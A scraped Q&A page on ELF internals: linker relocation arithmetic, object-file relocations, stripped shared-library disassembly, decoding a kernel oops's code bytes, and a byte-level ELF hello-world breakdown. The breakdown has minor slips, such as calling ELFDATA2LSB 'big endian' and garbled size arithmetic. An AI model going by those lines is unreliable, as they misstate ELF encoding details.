I am struggling in understanding how a linker perform relocation. According on the ELF manual (Relocation section, pag 27) a relocation of type R_386_PC32 is performed by calculating the quantity S + A - P (see ELF manual at page 29).
Now, consider the following ELF header:
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: REL (Relocatable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x0
Start of program headers: 0 (bytes into file)
Start of section headers: 560 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 0 (bytes)
Number of program headers: 0
Size of section headers: 40 (bytes)
Number of section headers: 13
Section header string table index: 10
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .text PROGBITS 00000000 000034 000038 00 AX 0 0 1
[ 2] .rel.text REL 00000000 0001b8 000010 08 I 11 1 4
[ 3] .data PROGBITS 00000000 00006c 000000 00 WA 0 0 1
[ 4] .bss NOBITS 00000000 00006c 000000 00 WA 0 0 1
[ 5] .rodata PROGBITS 00000000 00006c 00000f 00 A 0 0 1
[ 6] .comment PROGBITS 00000000 00007b 000035 01 MS 0 0 1
[ 7] .note.GNU-stack PROGBITS 00000000 0000b0 000000 00 0 0 1
[ 8] .eh_frame PROGBITS 00000000 0000b0 000044 00 A 0 0 4
[ 9] .rel.eh_frame REL 00000000 0001c8 000008 08 I 11 8 4
[10] .shstrtab STRTAB 00000000 0001d0 00005f 00 0 0 1
[11] .symtab SYMTAB 00000000 0000f4 0000b0 10 12 9 4
[12] .strtab STRTAB 00000000 0001a4 000013 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
There are no section groups in this file.
There are no program headers in this file.
Relocation section '.rel.text' at offset 0x1b8 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
0000001f 00000501 R_386_32 00000000 .rodata
00000024 00000a02 R_386_PC32 00000000 printf
Relocation section '.rel.eh_frame' at offset 0x1c8 contains 1 entries:
Offset Info Type Sym.Value Sym. Name
00000020 00000202 R_386_PC32 00000000 .text
The decoding of unwind sections for machine type Intel 80386 is not currently supported.
Symbol table '.symtab' contains 11 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 00000000 0 FILE LOCAL DEFAULT ABS asd.c
2: 00000000 0 SECTION LOCAL DEFAULT 1
3: 00000000 0 SECTION LOCAL DEFAULT 3
4: 00000000 0 SECTION LOCAL DEFAULT 4
5: 00000000 0 SECTION LOCAL DEFAULT 5
6: 00000000 0 SECTION LOCAL DEFAULT 7
7: 00000000 0 SECTION LOCAL DEFAULT 8
8: 00000000 0 SECTION LOCAL DEFAULT 6
9: 00000000 56 FUNC GLOBAL DEFAULT 1 main
10: 00000000 0 NOTYPE GLOBAL DEFAULT UND printf
No version information found in this file.
and the relative relocatable file:
asd.o: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
0: 8d 4c 24 04 lea 0x4(%esp),%ecx
4: 83 e4 f0 and $0xfffffff0,%esp
7: ff 71 fc pushl -0x4(%ecx)
a: 55 push %ebp
b: 89 e5 mov %esp,%ebp
d: 51 push %ecx
e: 83 ec 14 sub $0x14,%esp
11: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp)
18: 83 ec 08 sub $0x8,%esp
1b: ff 75 f4 pushl -0xc(%ebp)
1e: 68 00 00 00 00 push $0x0
23: e8 fc ff ff ff call 24 <main+0x24>
28: 83 c4 10 add $0x10,%esp
2b: b8 00 00 00 00 mov $0x0,%eax
30: 8b 4d fc mov -0x4(%ebp),%ecx
33: c9 leave
34: 8d 61 fc lea -0x4(%ecx),%esp
37: c3 ret
Given that the symbol printf has type R_386_PC32, the new offset has to be calculated as S + A - P. According the sym table S is equal to 0. The quantity A, according the ELF manual, is implicit in the location to be modified, therefore should be equal to 0xfffffffc (little endianess) and finally P should be r_offset, thus 0x24. It follows that the new offset should be equal to 0xffffffD8.
Instead, after linking the above program, I obtain:
0804840b <main>:
804840b: 8d 4c 24 04 lea 0x4(%esp),%ecx
804840f: 83 e4 f0 and $0xfffffff0,%esp
8048412: ff 71 fc pushl -0x4(%ecx)
8048415: 55 push %ebp
8048416: 89 e5 mov %esp,%ebp
8048418: 51 push %ecx
8048419: 83 ec 14 sub $0x14,%esp
804841c: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp)
8048423: 83 ec 08 sub $0x8,%esp
8048426: ff 75 f4 pushl -0xc(%ebp)
8048429: 68 d0 84 04 08 push $0x80484d0
804842e: e8 ad fe ff ff call 80482e0 <printf#plt>
8048433: 83 c4 10 add $0x10,%esp
8048436: b8 00 00 00 00 mov $0x0,%eax
804843b: 8b 4d fc mov -0x4(%ebp),%ecx
804843e: c9 leave
804843f: 8d 61 fc lea -0x4(%ecx),%esp
8048442: c3 ret
8048443: 66 90 xchg %ax,%ax
8048445: 66 90 xchg %ax,%ax
8048447: 66 90 xchg %ax,%ax
8048449: 66 90 xchg %ax,%ax
804844b: 66 90 xchg %ax,%ax
804844d: 66 90 xchg %ax,%ax
804844f: 90 nop
My question is: how is calculated the value actually stored in the final executable file as argument of the printf call(i.e., 0xfffffead)?
Except printf isn't in your object file, it's undefined. So yes, the specification is correct, it is going to be that address, but from your dump that address is not yet known. PS: also applies to your .rodata relocation.
– Jester
Related
I'm trying to understand elf relocation and there're couple of things that I don't really understand:
say I've got:
relamain.c
#include <stdio.h>
#include <stdlib.h>
#include "relafoo.c"
int main() {
int n;
scanf("%d",&n);
printf("\ngot %d, %d!=%d",n,n,factorial(n));
return 0;
}
and relafoo.c
int factorial(int n) {
if (n == 0 || n == 1) {
return 1;
}
return factorial(n-1)*n;
}
now in relamain.o readelf -r i see:
000000000027 000900000002 R_X86_64_PC32 0000000000000000 factorial - 4
000000000052 000500000002 R_X86_64_PC32 0000000000000000 .rodata - 4
00000000005c 000c00000004 R_X86_64_PLT32 0000000000000000 __isoc99_scanf - 4
000000000066 000900000002 R_X86_64_PC32 0000000000000000 factorial - 4
how come i have two offsets for the same function(factorial)
i objdump -d relamain.o:
0000000000000031 <main>:
31: 55 push rbp
32: 48 89 e5 mov rbp,rsp
35: 48 83 ec 10 sub rsp,0x10
39: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
40: 00 00
42: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax
46: 31 c0 xor eax,eax
48: 48 8d 45 f4 lea rax,[rbp-0xc]
4c: 48 89 c6 mov rsi,rax
4f: 48 8d 3d 00 00 00 00 lea rdi,[rip+0x0] # 56 <main+0x25>
56: b8 00 00 00 00 mov eax,0x0
5b: e8 00 00 00 00 call 60 <main+0x2f>
60: 8b 45 f4 mov eax,DWORD PTR [rbp-0xc]
63: 89 c7 mov edi,eax
65: e8 00 00 00 00 call 6a <main+0x39>
6a: 89 c1 mov ecx,eax
6c: 8b 55 f4 mov edx,DWORD PTR [rbp-0xc]
6f: 8b 45 f4 mov eax,DWORD PTR [rbp-0xc]
72: 89 c6 mov esi,eax
74: 48 8d 3d 00 00 00 00 lea rdi,[rip+0x0] # 7b <main+0x4a>
7b: b8 00 00 00 00 mov eax,0x0
80: e8 00 00 00 00 call 85 <main+0x54>
85: b8 00 00 00 00 mov eax,0x0
8a: 48 8b 75 f8 mov rsi,QWORD PTR [rbp-0x8]
8e: 64 48 33 34 25 28 00 xor rsi,QWORD PTR fs:0x28
95: 00 00
97: 74 05 je 9e <main+0x6d>
99: e8 00 00 00 00 call 9e <main+0x6d>
9e: c9 leave
9f: c3 ret
Looking at the produced code i see that all the calls are not referring to 66 nor 27 which are the offsets for my factorial function, why is that? according to "learning linux binary analysis" by Ryan "elfmaster" O'Neill, I should expect that at least i should see call 66 or call 27, can anyone explain this?
if anyone can link me to a good book that explains everything in details with examples(beyond man ofc) dynamic linking and relocations it would be great
1- You don't have two offset for the same function. you have two offset to two locations when the relocations must be applied. In your example you have two call to the function factorial. One at offset 0x26 and the other at offset 0x66 and the offset to the relocation linked to these calls are at offset 0x27 and 0x67. The "00000000" at the offsets 0x27 and 0x66 will be replaced by a value calculated by the linker. you can see the dump of the executable to be sure.
2- When creating the object file. The assembler don't know factorial address , so it places "00000000" and place a relocation to tell the linker to replace these 0 by the value needed to get factorial since only the linker will know it exact location.
3- May be Linkers & Loaders by John R. Levine. however what i suggest you, is to start reading http://www.skyfree.org/linux/references/ELF_Format.pdf. Maybe it can be enough, depending on the level of understanding you seek.
I have a simple c file:
// filename: test.c
void fun() {}
Then I compile test.c to libtest.so using commands:
gcc -shared -fPIC -Wl,--gc-sections -ffunction-sections -fdata-sections -o libtest.so test.c
strip -s ./libtest.so
Then use readelf to print symbols and its size:
readelf -sW ./libtest.so
I got:
Symbol table '.dynsym' contains 11 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000420 0 SECTION LOCAL DEFAULT 9
2: 0000000000000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
3: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _Jv_RegisterClasses
4: 0000000000000000 0 FUNC WEAK DEFAULT UND __cxa_finalize#GLIBC_2.2.5 (2)
5: 00000000002007c8 0 NOTYPE GLOBAL DEFAULT ABS _end
6: 00000000002007b8 0 NOTYPE GLOBAL DEFAULT ABS _edata
7: 00000000002007b8 0 NOTYPE GLOBAL DEFAULT ABS __bss_start
8: 0000000000000420 0 FUNC GLOBAL DEFAULT 9 _init
9: 000000000000052a 6 FUNC GLOBAL DEFAULT 11 fun
10: 0000000000000568 0 FUNC GLOBAL DEFAULT 12 _fini
Then use objdump to disassemble .text section of libtest.so:
objdump -S -d -j .text ./libtest.so
I got:
./libtest.so: file format elf64-x86-64
Disassembly of section .text:
0000000000000460 <fun-0xca>:
460: 48 83 ec 08 sub $0x8,%rsp
464: 48 8b 05 15 03 20 00 mov 0x200315(%rip),%rax # 200780 <_fini+0x200218>
46b: 48 85 c0 test %rax,%rax
46e: 74 02 je 472 <__cxa_finalize#plt+0x2a>
470: ff d0 callq *%rax
472: 48 83 c4 08 add $0x8,%rsp
476: c3 retq
477: 90 nop
478: 90 nop
479: 90 nop
47a: 90 nop
47b: 90 nop
47c: 90 nop
47d: 90 nop
47e: 90 nop
47f: 90 nop
480: 55 push %rbp
481: 80 3d 30 03 20 00 00 cmpb $0x0,0x200330(%rip) # 2007b8 <__bss_start>
488: 48 89 e5 mov %rsp,%rbp
48b: 41 54 push %r12
48d: 53 push %rbx
48e: 75 62 jne 4f2 <__cxa_finalize#plt+0xaa>
490: 48 83 3d f8 02 20 00 cmpq $0x0,0x2002f8(%rip) # 200790 <_fini+0x200228>
497: 00
498: 74 0c je 4a6 <__cxa_finalize#plt+0x5e>
49a: 48 8d 3d 57 01 20 00 lea 0x200157(%rip),%rdi # 2005f8 <_fini+0x200090>
4a1: e8 a2 ff ff ff callq 448 <__cxa_finalize#plt>
4a6: 48 8d 1d 3b 01 20 00 lea 0x20013b(%rip),%rbx # 2005e8 <_fini+0x200080>
4ad: 4c 8d 25 2c 01 20 00 lea 0x20012c(%rip),%r12 # 2005e0 <_fini+0x200078>
4b4: 48 8b 05 05 03 20 00 mov 0x200305(%rip),%rax # 2007c0 <__bss_start+0x8>
4bb: 4c 29 e3 sub %r12,%rbx
4be: 48 c1 fb 03 sar $0x3,%rbx
4c2: 48 83 eb 01 sub $0x1,%rbx
4c6: 48 39 d8 cmp %rbx,%rax
4c9: 73 20 jae 4eb <__cxa_finalize#plt+0xa3>
4cb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
4d0: 48 83 c0 01 add $0x1,%rax
4d4: 48 89 05 e5 02 20 00 mov %rax,0x2002e5(%rip) # 2007c0 <__bss_start+0x8>
4db: 41 ff 14 c4 callq *(%r12,%rax,8)
4df: 48 8b 05 da 02 20 00 mov 0x2002da(%rip),%rax # 2007c0 <__bss_start+0x8>
4e6: 48 39 d8 cmp %rbx,%rax
4e9: 72 e5 jb 4d0 <__cxa_finalize#plt+0x88>
4eb: c6 05 c6 02 20 00 01 movb $0x1,0x2002c6(%rip) # 2007b8 <__bss_start>
4f2: 5b pop %rbx
4f3: 41 5c pop %r12
4f5: c9 leaveq
4f6: c3 retq
4f7: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1)
4fe: 00 00
500: 48 83 3d e8 00 20 00 cmpq $0x0,0x2000e8(%rip) # 2005f0 <_fini+0x200088>
507: 00
508: 55 push %rbp
509: 48 89 e5 mov %rsp,%rbp
50c: 74 1a je 528 <__cxa_finalize#plt+0xe0>
50e: 48 8b 05 73 02 20 00 mov 0x200273(%rip),%rax # 200788 <_fini+0x200220>
515: 48 85 c0 test %rax,%rax
518: 74 0e je 528 <__cxa_finalize#plt+0xe0>
51a: 48 8d 3d cf 00 20 00 lea 0x2000cf(%rip),%rdi # 2005f0 <_fini+0x200088>
521: c9 leaveq
522: ff e0 jmpq *%rax
524: 0f 1f 40 00 nopl 0x0(%rax)
528: c9 leaveq
529: c3 retq
000000000000052a <fun>:
52a: 55 push %rbp
52b: 48 89 e5 mov %rsp,%rbp
52e: c9 leaveq
52f: c3 retq
530: 55 push %rbp
531: 48 89 e5 mov %rsp,%rbp
534: 53 push %rbx
535: 48 83 ec 08 sub $0x8,%rsp
539: 48 8b 05 90 00 20 00 mov 0x200090(%rip),%rax # 2005d0 <_fini+0x200068>
540: 48 83 f8 ff cmp $0xffffffffffffffff,%rax
544: 74 19 je 55f <fun+0x35>
546: 48 8d 1d 83 00 20 00 lea 0x200083(%rip),%rbx # 2005d0 <_fini+0x200068>
54d: 0f 1f 00 nopl (%rax)
550: 48 83 eb 08 sub $0x8,%rbx
554: ff d0 callq *%rax
556: 48 8b 03 mov (%rbx),%rax
559: 48 83 f8 ff cmp $0xffffffffffffffff,%rax
55d: 75 f1 jne 550 <fun+0x26>
55f: 48 83 c4 08 add $0x8,%rsp
563: 5b pop %rbx
564: c9 leaveq
565: c3 retq
We can tell that the size of symbol fun is 6 which is correspond to virtual address 0x52a ~ 0x52f.
I have two question:
what does symbol fun-0xca do?
what does assembly code from 0x530 to 0x565 in symbol fun do?
Omit the strip -s ./libtest.so.
In the GCC-created libtest.so, each separate function has a symbol in the symbol table. objdump -drwC -Mintel libtest.so will show names for each one, like _init, deregister_tm_clones, register_tm_clones, and __do_global_dtors_aux. These come from CRT startup code, I think; use gcc -v when you're linking to see any extra .o files it passes to ld.
Stripping symbols removes that information, leaving machine code in the text section without a symbol name. The only symbol left for objdump to reference is fun, so it labels the first block of code relative to that, as fun-0xca.
I have the following stack trace and crash information after the Linux kernel failed to load:
[ 3.684670] ------------[ cut here ]------------
[ 3.695507] Bad FPU state detected at fpu__clear+0x91/0xc2, reinitializing FPU registers.
[ 3.695508] traps: No user code available.
[ 3.704745] invalid opcode: 0000 [#1] PREEMPT
[ 3.715304] CPU: 0 PID: 1 Comm: swapper Not tainted 4.19.50-android-x86-geeb7e76-dirty #1
[ 3.724594] Hardware name: AAEON UP-APL01/UP-APL01, BIOS UPA1AM21 09/01/2017
[ 3.732622] EIP: ex_handler_fprestore+0x2e/0x65
[ 3.737807] Code: 00 55 89 e5 57 8b 48 04 8d 44 08 04 89 42 30 80 3d e7 fb a0 c1 00 75 16 c6 05 e7 fb a0 c1 01 50 68 b4 38 87 c1 e8 98 ba 00 00 <0f> 0b 58 5a 90 8d 74 26 00 eb f
[ 3.759027] EAX: 0000004d EBX: c103d6f9 ECX: c19a2a48 EDX: c19a2a48
[ 3.766169] ESI: df4c7e04 EDI: 00000006 EBP: df4c7c6c ESP: df4c7c60
[ 3.773316] DS: 007b ES: 007b FS: 0000 GS: 00e0 SS: 0068 EFLAGS: 00010292
[ 3.781044] CR0: 80050033 CR2: c168c6b4 CR3: 1e902000 CR4: 001406d0
[ 3.788184] Call Trace:
[ 3.791026] ? fpu__clear+0x91/0xc2
[ 3.795037] fixup_exception+0x61/0x6e
[ 3.799348] do_trap+0x35/0xe9
[ 3.802864] do_invalid_op+0xd9f/0x108a
[ 3.807269] ? atime_needs_update+0x68/0xf5
[ 3.812058] ? touch_atime+0x37/0xbd
[ 3.816168] ? __check_object_size+0x83/0x123
[ 3.821153] ? fpu__clear+0x8e/0xc2
[ 3.825166] ? generic_file_read_iter+0x28d/0x723
[ 3.830544] ? generic_file_read_iter+0x28d/0x723
[ 3.835931] ? __vfs_read+0xe9/0x11f
[ 3.840043] common_exception+0x105/0x10e
[ 3.844634] EIP: fpu__clear+0x91/0xc2
[ 3.848840] Code: eb 05 e8 b4 f2 fd ff ff 0d 98 a8 99 c1 74 3b 90 8d 74 26 00 eb 07 90 8d 74 26 00 eb 1c 83 c8 ff bf c0 8c a2 c1 89 c2 0f c7 1f <a1> f4 8b a2 c1 ff 0d 98 a8 99 1
[ 3.870070] EAX: ffffffff EBX: df4c5900 ECX: 00000000 EDX: ffffffff
[ 3.877210] ESI: df4c5900 EDI: c1a28cc0 EBP: df4c7e4c ESP: df4c7e40
[ 3.884356] DS: 007b ES: 007b FS: 0000 GS: 00e0 SS: 0068 EFLAGS: 00010286
[ 3.892085] ? do_alignment_check+0x1a/0x1a
[ 3.896878] ? common_exception+0x105/0x10e
[ 3.901674] flush_thread+0x33/0x37
[ 3.905684] flush_old_exec+0x540/0x5f9
[ 3.910085] load_elf_binary+0x24b/0xec1
[ 3.914584] ? pick_next_task_fair+0xdf/0x13a
[ 3.919575] ? __schedule+0x4bb/0x63f
[ 3.923780] ? sched_debug_header+0x45/0x40a
[ 3.928666] ? preempt_schedule+0x2d/0x3c
[ 3.933266] search_binary_handler+0x89/0x1ac
[ 3.938259] load_script+0x184/0x19f
[ 3.942366] search_binary_handler+0x89/0x1ac
[ 3.947354] __do_execve_file+0x454/0x668
[ 3.951954] do_execve+0x1b/0x1d
[ 3.955673] run_init_process+0x31/0x36
[ 3.960082] ? rest_init+0x99/0x99
[ 3.963992] kernel_init+0x5e/0xdf
[ 3.967905] ret_from_fork+0x19/0x30
[ 3.972014] Modules linked in:
[ 3.975542] ---[ end trace 7d27fceeb3852a38 ]---
[ 3.980823] EIP: ex_handler_fprestore+0x2e/0x65
[ 3.986014] Code: 00 55 89 e5 57 8b 48 04 8d 44 08 04 89 42 30 80 3d e7 fb a0 c1 00 75 16 c6 05 e7 fb a0 c1 01 50 68 b4 38 87 c1 e8 98 ba 00 00 <0f> 0b 58 5a 90 8d 74 26 00 eb f
[ 4.007247] EAX: 0000004d EBX: c103d6f9 ECX: c19a2a48 EDX: c19a2a48
[ 4.014387] ESI: df4c7e04 EDI: 00000006 EBP: df4c7c6c ESP: c1afa3b0
[ 4.021536] DS: 007b ES: 007b FS: 0000 GS: 00e0 SS: 0068 EFLAGS: 00010292
[ 4.029265] CR0: 80050033 CR2: c168c6b4 CR3: 1e902000 CR4: 001406d0
[ 4.036413] note: swapper[1] exited with preempt_count 1
What does the Code mean? Also can I know the exact x86 instruction (not the C function) that caused the kernel to crash?
EDIT: Updated the code. I was trying to run Linux in a virtualized environment.
Code is a hexdump of x86 machine code (presumably 32-bit mode from a legacy 32-bit kernel since it only dumped 32-bit register contents).
The byte marked with <> is where EIP is pointing, so it's the faulting instruction inside ex_handler_fprestore
Feed it to a disassembler, e.g. https://defuse.ca/online-x86-assembler.htm#disassembly2, or Linux's crashdump decoding script https://elixir.bootlin.com/linux/latest/source/scripts/decodecode
Remember that x86 machine code uses a variable-length encoding that can't be unambiguously decoded backwards. But this is compiler-generated code, so at least we can assume there aren't supposed to be overlapping instructions or static data mixed with code (because x86 has no benefit for that). If we find the start of a function in compiler-generated code, the rest of the instructions will all be "sane".
The 00 byte looks like part of a previous instruction or padding between functions: Decoding from there would give us add BYTE PTR [ebp-0x77],dl which is plausible, in eax,0x57 after that isn't, for a non-driver function.
Much more likely is that the 0x89 byte is the opcode of a MOV instruction.
If we drop the 00 byte and start from 55 (which is push ebp), we get a normal function body including the stack-frame setup prologue you'd expect if compiled with -Os or -fno-omit-frame-pointer.
In general, you can drop bytes one at a time until you get a sane-looking decoding that at least has an instruction-boundary on the faulting instruction. (But some experience is required for "sane-looking"; disassembly may have gotten in sync by chance after starting wrong. That's not rare for x86 machine code.)
# skipped the 00 byte which would desync decoding
0: 55 push ebp
1: 89 e5 mov ebp,esp
3: 57 push edi
4: 8b 48 04 mov ecx,DWORD PTR [eax+0x4] # EAX = 1st function arg, ECX = tmp
7: 8d 44 08 04 lea eax,[eax+ecx*1+0x4]
b: 89 42 30 mov DWORD PTR [edx+0x30],eax # EDX = 2rd function arg
e: 80 3d e7 fb a0 c1 00 cmp BYTE PTR ds:0xc1a0fbe7,0x0
15: 75 16 jne 0x2d
17: c6 05 e7 fb a0 c1 01 mov BYTE PTR ds:0xc1a0fbe7,0x1
1e: 50 push eax
1f: 68 b4 38 87 c1 push 0xc18738b4
24: e8 98 ba 00 00 call 0xbac1
29: 0f 0b ud2 ### <=== EIP points here
# stuff after this probably isn't real code; it's unreachable
2b: 58 pop eax
2c: 5a pop edx
2d: 90 nop
2e: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]
32: eb .byte 0xeb
So this function really ends with a call to a noreturn function with stack args. (32-bit x86 Linux kernels are built with -mregparm=3 so the first 3 args are in EAX, EDX, ECX in that order, so either this function is not regparm or it has more than 3 args. You can see this function uses EAX and EDX as incoming args: reading them before writing.)
But it's not a jmp tailcall for some reason; maybe for exception backtracing it wants this function's stack frame on the stack. (Which might explain the push ebp / mov ebp,esp even if this kernel was built with -fomit-frame-pointer as part of -O2.)
You'd have to look at the C source for ex_handler_fprestore to guess why that might be.
ud2 is an illegal instruction. The compiler (or inline asm?) put it there so it would fault if the function returned. It's a clear sign that this path of execution is supposed to be unreachable, or is marked to intentionally trap as an assert() type of mechanism. (In Linux, look for BUG_ON()).
Just curious. This obviously isn't a very good solution for actual programming, but say I wanted to make an executable in Bless (a hex editor).
My architecture is x86. What's a very simple program I can make? A hello world? An infinite loop? Similar to this question, but in Linux.
Decompile a NASM hello world and understand every byte in it
Version of this answer with a nice TOC and more content: http://www.cirosantilli.com/elf-hello-world (hitting the 30k char limit here)
Standards
ELF is specified by the LSB:
core generic: http://refspecs.linuxfoundation.org/LSB_4.1.0/LSB-Core-generic/LSB-Core-generic/elf-generic.html
core AMD64: http://refspecs.linuxfoundation.org/LSB_4.1.0/LSB-Core-AMD64/LSB-Core-AMD64/book1.html
The LSB basically links to other standards with minor extensions, in particular:
generic (both by SCO):
System V ABI 4.1 (1997) http://www.sco.com/developers/devspecs/gabi41.pdf, no 64 bit, although a magic number is reserved for it. Same for core files.
System V ABI Update DRAFT 17 (2003) http://www.sco.com/developers/gabi/2003-12-17/contents.html, adds 64 bit. Only updates chapters 4 and 5 of the previous document: the others remain valid and are still referenced.
architecture specific:
IA-32: http://refspecs.linuxfoundation.org/LSB_4.1.0/LSB-Core-IA32/LSB-Core-IA32/elf-ia32.html, points mostly to http://www.sco.com/developers/devspecs/abi386-4.pdf
AMD64: http://refspecs.linuxfoundation.org/LSB_4.1.0/LSB-Core-AMD64/LSB-Core-AMD64/elf-amd64.html, points mostly to http://www.x86-64.org/documentation/abi.pdf
A handy summary can be found at:
man elf
Its structure can be examined in a human readable way via utilities like readelf and objdump.
Generate the example
Let's break down a minimal runnable Linux x86-64 example:
section .data
hello_world db "Hello world!", 10
hello_world_len equ $ - hello_world
section .text
global _start
_start:
mov rax, 1
mov rdi, 1
mov rsi, hello_world
mov rdx, hello_world_len
syscall
mov rax, 60
mov rdi, 0
syscall
Compiled with:
nasm -w+all -f elf64 -o 'hello_world.o' 'hello_world.asm'
ld -o 'hello_world.out' 'hello_world.o'
Versions:
NASM 2.10.09
Binutils version 2.24 (contains ld)
Ubuntu 14.04
We don't use a C program as that would complicate the analysis, that will be level 2 :-)
Hexdumps
hd hello_world.o
hd hello_world.out
Output at: https://gist.github.com/cirosantilli/7b03f6df2d404c0862c6
Global file structure
An ELF file contains the following parts:
ELF header. Points to the position of the section header table and the program header table.
Section header table (optional on executable). Each has e_shnum section headers, each pointing to the position of a section.
N sections, with N <= e_shnum (optional on executable)
Program header table (only on executable). Each has e_phnum program headers, each pointing to the position of a segment.
N segments, with N <= e_phnum (optional on executable)
The order of those parts is not fixed: the only fixed thing is the ELF header that must be the first thing on the file: Generic docs say:
ELF header
The easiest way to observe the header is:
readelf -h hello_world.o
readelf -h hello_world.out
Output at: https://gist.github.com/cirosantilli/7b03f6df2d404c0862c6
Bytes in the object file:
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 01 00 3e 00 01 00 00 00 00 00 00 00 00 00 00 00 |..>.............|
00000020 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 |........#.......|
00000030 00 00 00 00 40 00 00 00 00 00 40 00 07 00 03 00 |....#.....#.....|
Executable:
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 3e 00 01 00 00 00 b0 00 40 00 00 00 00 00 |..>.......#.....|
00000020 40 00 00 00 00 00 00 00 10 01 00 00 00 00 00 00 |#...............|
00000030 00 00 00 00 40 00 38 00 02 00 40 00 06 00 03 00 |....#.8...#.....|
Structure represented:
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf64_Half e_type;
Elf64_Half e_machine;
Elf64_Word e_version;
Elf64_Addr e_entry;
Elf64_Off e_phoff;
Elf64_Off e_shoff;
Elf64_Word e_flags;
Elf64_Half e_ehsize;
Elf64_Half e_phentsize;
Elf64_Half e_phnum;
Elf64_Half e_shentsize;
Elf64_Half e_shnum;
Elf64_Half e_shstrndx;
} Elf64_Ehdr;
Manual breakdown:
0 0: EI_MAG = 7f 45 4c 46 = 0x7f 'E', 'L', 'F': ELF magic number
0 4: EI_CLASS = 02 = ELFCLASS64: 64 bit elf
0 5: EI_DATA = 01 = ELFDATA2LSB: big endian data
0 6: EI_VERSION = 01: format version
0 7: EI_OSABI (only in 2003 Update) = 00 = ELFOSABI_NONE: no extensions.
0 8: EI_PAD = 8x 00: reserved bytes. Must be set to 0.
1 0: e_type = 01 00 = 1 (big endian) = ET_REl: relocatable format
On the executable it is 02 00 for ET_EXEC.
1 2: e_machine = 3e 00 = 62 = EM_X86_64: AMD64 architecture
1 4: e_version = 01 00 00 00: must be 1
1 8: e_entry = 8x 00: execution address entry point, or 0 if not applicable like for the object file since there is no entry point.
On the executable, it is b0 00 40 00 00 00 00 00. TODO: what else can we set this to? The kernel seems to put the IP directly on that value, it is not hardcoded.
2 0: e_phoff = 8x 00: program header table offset, 0 if not present.
40 00 00 00 on the executable, i.e. it starts immediately after the ELF header.
2 8: e_shoff = 40 7x 00 = 0x40: section header table file offset, 0 if not present.
3 0: e_flags = 00 00 00 00 TODO. Arch specific.
3 4: e_ehsize = 40 00: size of this elf header. TODO why this field? How can it vary?
3 6: e_phentsize = 00 00: size of each program header, 0 if not present.
38 00 on executable: it is 56 bytes long
3 8: e_phnum = 00 00: number of program header entries, 0 if not present.
02 00 on executable: there are 2 entries.
3 A: e_shentsize and e_shnum = 40 00 07 00: section header size and number of entries
3 E: e_shstrndx (Section Header STRing iNDeX) = 03 00: index of the .shstrtab section.
Section header table
Array of Elf64_Shdr structs.
Each entry contains metadata about a given section.
e_shoff of the ELF header gives the starting position, 0x40 here.
e_shentsize and e_shnum from the ELF header say that we have 7 entries, each 0x40 bytes long.
So the table takes bytes from 0x40 to 0x40 + 7 + 0x40 - 1 = 0x1FF.
Some section names are reserved for certain section types: http://www.sco.com/developers/gabi/2003-12-17/ch4.sheader.html#special_sections e.g. .text requires a SHT_PROGBITS type and SHF_ALLOC + SHF_EXECINSTR
readelf -S hello_world.o:
There are 7 section headers, starting at offset 0x40:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .data PROGBITS 0000000000000000 00000200
000000000000000d 0000000000000000 WA 0 0 4
[ 2] .text PROGBITS 0000000000000000 00000210
0000000000000027 0000000000000000 AX 0 0 16
[ 3] .shstrtab STRTAB 0000000000000000 00000240
0000000000000032 0000000000000000 0 0 1
[ 4] .symtab SYMTAB 0000000000000000 00000280
00000000000000a8 0000000000000018 5 6 4
[ 5] .strtab STRTAB 0000000000000000 00000330
0000000000000034 0000000000000000 0 0 1
[ 6] .rela.text RELA 0000000000000000 00000370
0000000000000018 0000000000000018 4 2 4
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
struct represented by each entry:
typedef struct {
Elf64_Word sh_name;
Elf64_Word sh_type;
Elf64_Xword sh_flags;
Elf64_Addr sh_addr;
Elf64_Off sh_offset;
Elf64_Xword sh_size;
Elf64_Word sh_link;
Elf64_Word sh_info;
Elf64_Xword sh_addralign;
Elf64_Xword sh_entsize;
} Elf64_Shdr;
Sections
Index 0 section
Contained in bytes 0x40 to 0x7F.
The first section is always magic: http://www.sco.com/developers/gabi/2003-12-17/ch4.sheader.html says:
If the number of sections is greater than or equal to SHN_LORESERVE (0xff00), e_shnum has the value SHN_UNDEF (0) and the actual number of section header table entries is contained in the sh_size field of the section header at index 0 (otherwise, the sh_size member of the initial entry contains 0).
There are also other magic sections detailed in Figure 4-7: Special Section Indexes.
SHT_NULL
